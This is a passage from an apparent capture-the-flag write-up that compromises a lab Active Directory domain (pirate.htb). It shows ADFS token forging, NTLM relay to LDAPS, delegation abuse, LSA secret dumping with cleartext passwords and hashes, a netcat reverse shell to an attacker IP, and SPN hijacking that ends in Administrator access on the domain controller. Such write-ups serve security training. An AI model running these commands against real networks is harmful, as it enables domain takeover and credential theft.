o1uAZJoQ9yI5dFxfIQ4NF7aB3K+z1C+I774omOhBtV7/eaEVRKmZgxx+rT5+7RdvhTEP+nMEVV04da1v8/xku/upI5XGb+h/qhdYWgp6nj9sXg+aYFD438HTTmcpPMYYamlrAw/itFQ1F3YB27JrAxTXs4fsZEz1w8pUtOisg2ol8JmIfnooqvNSDJiMB9I7FVwo1reBLPvWvDUWJUg4nxJZBSBsfpnXdwJVYVhqJ94R1bcfE2MICPg5K1T6jAuxOrAXrGjmb/cMZgHKzE5FQBPdlvE74jo1++NCgSff0HX/XdcAdJuYu7F9WDD7AHOkgSNtQsVGH3eB1RkbWInc5Bu2R49L8dwfWfM031LSGWso7kRIeuAdL70Xd5+xLsofd0goPocxl/qFrPBq+6ssfxANPqyxsBjwNvS9sF6kezHjzSHoJqs8g3w+X/gvLDc4BB+HXV0Ix2Fug+dmTgW3rFOXFs189hxuE5rwTglQFSU+Tx7RyTktf0yqCTmFPNWqjOmQTob2T+yneqJ8UPxtmDryc7x+XJN' | base64 -d > TKSKey.bin

echo -n '7C-5B-51-35-74-58-CD-98-F0-0F-7E-CC-07-F4-60-BB-FC-7D-E9-68-95-07-4C-4E-FD-29-1B-5A-75-3A-2C-E4' | tr -d "-" | xxd -r -p > DKMkey.bin

Download ADFSSppof.

python ADFSpoof/ADFSpoof.py -b TKSKey.bin DKMkey.bin dump

We get a file token.pfx.

We could obtain valid SAML2 tokens for services with any user, for example:

python ADFSpoof/ADFSpoof.py -b TKSKey.bin DKMkey.bin -s adfs.pirate.htb saml2 --endpoint https://WEB01/adfs/ls/SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PIRATE\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PIRATE\administrator</AttributeValue></Attribute>'

In reality, I did not quite understand whether there are services on WEB01 or DC01 where this can be exploited.

Therefore, I proceeded with another route.

NTLM Relay and RBCD

In the initial nxc ldap command, we can notice:

signing:None

Therefore, we can coerce an authentication from WEB01$ and perform an NTLM relay to LDAPS on the dc01.pirate.htb domain controller.

We need to use a local authentication, as explained here: https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Therefore, we need to register a DNS entry with the name web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.

python3 bloodyAD/bloodyAD.py --host dc01.pirate.htb -d pirate.htb --dc-ip 10.129.11.148 -u pentest -p 'p3nt3st2025!&' add dnsRecord 'web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' 10.10.16.149
[+] Adding "web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" to "DC=pirate.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=pirate,DC=htb"
[+] web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA has been successfully added

Run in one terminal:

ntlmrelayx.py -t ldaps://dc01.pirate.htb -smb2support --interactive

Run in another terminal:

coercer coerce -l 'web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -t 192.168.100.2 -u pentest -p 'p3nt3st2025!&' -d pirate.htb -v --always-continue

In the terminal running ntlmrelayx, we get:

[*] (HTTP): Client requested path: /whb/pipe/srvsvc
[*] (HTTP): Authenticating connection from PIRATE/WEB01$@10.129.12.191 against ldaps://dc01.pirate.htb SUCCEED [1]
[*] ldaps://PIRATE/WEB01$@dc01.pirate.htb [1] -> Started interactive Ldap shell via TCP on 127.0.0.1:11000 as PIRATE/WEB01$
nc 127.0.0.1 11000
# set_rbcd WEB01$ gMSA_ADFS_prod$
Found Target DN: CN=WEB01,CN=Computers,DC=pirate,DC=htb
Target SID: S-1-5-21-4107424128-4158083573-1300325248-3102

Found Grantee DN: CN=gMSA_ADFS_prod,CN=Managed Service Accounts,DC=pirate,DC=htb
Grantee SID: S-1-5-21-4107424128-4158083573-1300325248-4108
Delegation rights modified successfully!
gMSA_ADFS_prod$ can now impersonate users on WEB01$ via S4U2Proxy
getST.py -spn 'cifs/web01.pirate.htb' -impersonate 'Administrator' -dc-ip 10.129.12.191 -hashes ':8126756fb2e69697bfcb04816e685839' pirate.htb/'gMSA_ADFS_prod$'
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_web01.pirate.htb@PIRATE.HTB.ccache
export KRB5CCNAME='Administrator@cifs_web01.pirate.htb@PIRATE.HTB.ccache'

nxc smb 192.168.100.2 -u Administrator -k --use-kcache --lsa
SMB         192.168.100.2   445    WEB01            [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:None)
SMB         192.168.100.2   445    WEB01            [+] pirate.htb\Administrator from ccache (Pwn3d!)
SMB         192.168.100.2   445    WEB01            [*] Dumping LSA secrets
SMB         192.168.100.2   445    WEB01            PIRATE.HTB/Administrator:$DCC2$10240#Administrator#8baf09ddc5830ac4456ee8639dd89644: (2026-02-25 02:41:09)
SMB         192.168.100.2   445    WEB01            PIRATE.HTB/gMSA_ADFS_prod$:$DCC2$10240#gMSA_ADFS_prod$#66812dfee46ff41c9c8245a2819c3183: (2026-03-03 16:33:19)
SMB         192.168.100.2   445    WEB01            PIRATE.HTB/a.white:$DCC2$10240#a.white#366c8924be3ea6d1d12825569a4bcc39: (2026-03-03 16:31:16)
SMB         192.168.100.2   445    WEB01            PIRATE\WEB01$:plain_password_hex:29f1505d87014b01b4317fed1d52ddbee2792a698e7e1de1bcdf29ab5d4b8e54828ce470d23491ba84e82d786622a821a14c730cf8610a32db1951b7619ee08c3bcacbab53aac8e052bd64e638c6bbd9529daacf04f86cfb9034808c4378d2c328c8c6afe7655f4a099dc41caeb6279c53313edcbd58db3e14490b7543ba3250ac200ec9834992b61b3f4319162645b50f402de4db0843fc43db7d54e04828abf86e490959bc88670e50f0b50373a3745f70039f8fd032435c4a725526957c7ae0dbaa81273b3aa28c0b029fea90c271b6601ef3ba7a05a13ec8c8ffd9999dd10eee87b4b9eb08a8a4af90710056f558
SMB         192.168.100.2   445    WEB01            PIRATE\WEB01$:aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9:::
SMB         192.168.100.2   445    WEB01            PIRATE\a.white:E2nvAOKSz5Xz2MJu
SMB         192.168.100.2   445    WEB01            dpapi_machinekey:0x01cffc2ef9a91d20107371f9a4a4112c892ed989
dpapi_userkey:0xa4fddb1b2df2db7cc3d044dc1b559bc1b45a1de9
SMB         192.168.100.2   445    WEB01            _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11:e3ef474b98138dd4469f6dc176f879ba1e0817ba44502187b9080b9f3334c91b9b1af1ce4e91fb562c8d8824412c700e00d105bc674d8e26a594e3da4173f2c87313d634b39c3412d4bfb6849247686df6065b536566807e0ace92f94ea3166bb9752d12d352c89b9fdafa7d3171e4dd55be9d585504f8c628a0ff4c670d7595a909a3c9a7ec2dff984e5ddf77049a91a5597f0a39c5499455675901cce41aded98d80a1b5f7f82cc220b590df4bfc0bfc5f0feb66e73a56f1ab7fe914c6d7cd2b83e0b9065b76e02bc330f7694416f3acd6c463df84923500b64a1014e74413809a7a06af577ce7685bfd2ab56a2067
SMB         192.168.100.2   445    WEB01            _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11:01000000220100001000000012011a01b6c4083911a28350b1fd6948803650e1b1c5741f7719b1f4ff926203dcdf4ec9c0369b7b92fe10a2d7ff953bfa406a3b6786523ed82767cc8fe2734af892e98efbef2b3476759032b4ecdef34276c363b8a9410b63d809ea6ef167f5b541d73c3ac4214da22a14d97982c928d91bb971fe99d4809c1ebdeae8e769c6b3377ee1a478dffbb2ddc13318be131167d1a4a01833a4c27e0512690d73de1e59a01761ec7d40fc1882050cbf439d9cbb281a06d4bf8d85d1feb2740ec399eca0e46e36990b72b2c4a64ae009bafb3dfd264ff734b63fb922609e8c305883a75d9aef75ce37bca0910436590d9312fca46ad89a61a89bddc873197de48eab3d69b9e49800001941b01b7317000019e3df6872170000
SMB         192.168.100.2   445    WEB01            GMSA ID: a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11 NTLM: 841fae962662f0c2f0178d01d178ec3e
SMB         192.168.100.2   445    WEB01            [+] Dumped 9 LSA secrets to /home/kali/.nxc/logs/lsa/WEB01_192.168.100.2_2026-03-04_004610.secrets and /home/kali/.nxc/logs/lsa/WEB01_192.168.100.2_2026-03-04_004610.cached

We found a.white's password.

nxc smb 192.168.100.2 -u a.white -p 'E2nvAOKSz5Xz2MJu'
SMB         192.168.100.2   445    WEB01            [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:None)
SMB         192.168.100.2   445    WEB01            [+] pirate.htb\a.white:E2nvAOKSz5Xz2MJu

Now we can obtain a shell as a.white on WEB01 using RunasCs.exe.

Upload RunasCs to WEB01 and nc64.exe.

Listen with netcat:

rlwrap nc -vlnp 4444

In the gMSA_ADFS_prod$ PowerShell shell on WEB01:

.\RunasCs.exe -b a.white "E2nvAOKSz5Xz2MJu" "C:\tmp\nc64.exe -e cmd.exe 10.10.16.149 4444"

We get a reverse shell as user a.white.

On the user's desktop, we find the user flag.

From BloodHound, we notice that a.white can change a.white_adm's password.

python3 bloodyAD/bloodyAD.py --host dc01.pirate.htb -d pirate.htb --dc-ip 10.129.12.191 -u a.white -p 'E2nvAOKSz5Xz2MJu' set password a.white_adm 'Summer2025!'
[+] Password changed successfully!
nxc smb dc01.pirate.htb -u a.white_adm -p 'Summer2025!'
SMB         10.129.12.191   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.12.191   445    DC01             [+] pirate.htb\a.white_adm:Summer2025!

From BloodHound, we see that a.white_adm is a member of the IT group, which has a WriteSPN relationship to DC01.

Also, if we inspect a.white_adm:

python3 bloodyAD/bloodyAD.py --host 'dc01.pirate.htb' -d pirate.htb --dc-ip 10.129.12.191 -u 'pentest' -p 'p3nt3st2025!&' get object 'a.white_adm'

We notice:

msDS-AllowedToDelegateTo: http/WEB01.pirate.htb; HTTP/WEB01
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD; TRUSTED_TO_AUTH_FOR_DELEGATION

Therefore, it can impersonate any user for the http/WEB01.pirate.htb and HTTP/WEB01 SPNs.

Let's look at the SPNs of WEB01$.

Download krbrelayx.

python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'WEB01$' -s aaaaaa -q dc01.pirate.htb
DN: CN=WEB01,CN=Computers,DC=pirate,DC=htb - STATUS: Read - READ TIME: 2026-03-04T01:17:54.423153
    dNSHostName: WEB01.pirate.htb
    sAMAccountName: WEB01$
    servicePrincipalName: tapinego/WEB01
                          tapinego/WEB01.pirate.htb
                          WSMAN/WEB01
                          WSMAN/WEB01.pirate.htb
                          HOST/WEB01.pirate.htb
                          RestrictedKrbHost/WEB01.pirate.htb
                          HOST/WEB01
                          RestrictedKrbHost/WEB01
                          TERMSRV/WEB01.pirate.htb
                          TERMSRV/WEB01
                          HTTP/WEB01
                          HTTP/WEB01.pirate.htb

We can see those two SPNs.

Therefore, if we try to add them to DC01$, we get an error:

python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s http/WEB01.pirate.htb dc01.pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[!] Could not modify object, the server reports a constrained violation
[!] You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname)
[!] To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute

However, since we have compromised WEB01$, we can simply remove those SPNs.

python3 krbrelayx/addspn.py -u 'pirate.htb\WEB01$' -p 'aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9' -t 'WEB01$' -s http/web01.pirate.htb -r dc01.pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
python3 krbrelayx/addspn.py -u 'pirate.htb\WEB01$' -p 'aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9' -t 'WEB01$' -s http/web01 -r dc01.pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Now we can add those two SPNs to DC01 using a.white_adm's credentials.

python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s http/web01.pirate.htb dc01.pirate.htb

python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s http/web01 dc01.pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Now we can request a ticket for Administrator with one of those two SPNs.

getST.py -spn 'HTTP/web01.pirate.htb' -impersonate 'Administrator' -dc-ip 10.129.12.191 pirate.htb/'a.white_adm':'Summer2025!'
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@HTTP_web01.pirate.htb@PIRATE.HTB.ccache

Important: I used uppercase HTTP in the SPN, because otherwise Evil-WinRM did not work afterward.

The HTTP protocol is used by WinRM. However, to obtain a PowerShell session, we also need the WSMAN/WEB01 and WSMAN/WEB01.pirate.htb SPNs.

We need to remove them from WEB01 and put them on DC01.

python3 krbrelayx/addspn.py -u 'pirate.htb\WEB01$' -p 'aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9' -t 'WEB01$' -s wsman/web01.pirate.htb -r dc01.pirate.htb
python3 krbrelayx/addspn.py -u 'pirate.htb\WEB01$' -p 'aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9' -t 'WEB01$' -s wsman/web01 -r dc01.pirate.htb
python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s wsman/web01 dc01.pirate.htb
python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s wsman/web01.pirate.htb dc01.pirate.htb
export KRB5CCNAME='Administrator@HTTP_web01.pirate.htb@PIRATE.HTB.ccache'

Before connecting with Evil-WinRM, we need to add web01.pirate.htb to /etc/hosts for the IP address of dc01.pirate.htb (in my case, 10.129.12.191).

Now we can connect with Evil-WinRM:

evil-winrm -i web01.pirate.htb -r pirate.htb

Important: I used web01.pirate.htb, not dc01.pirate.htb.

We get a PowerShell shell as Administrator.

hostname
DC01
whoami
pirate\administrator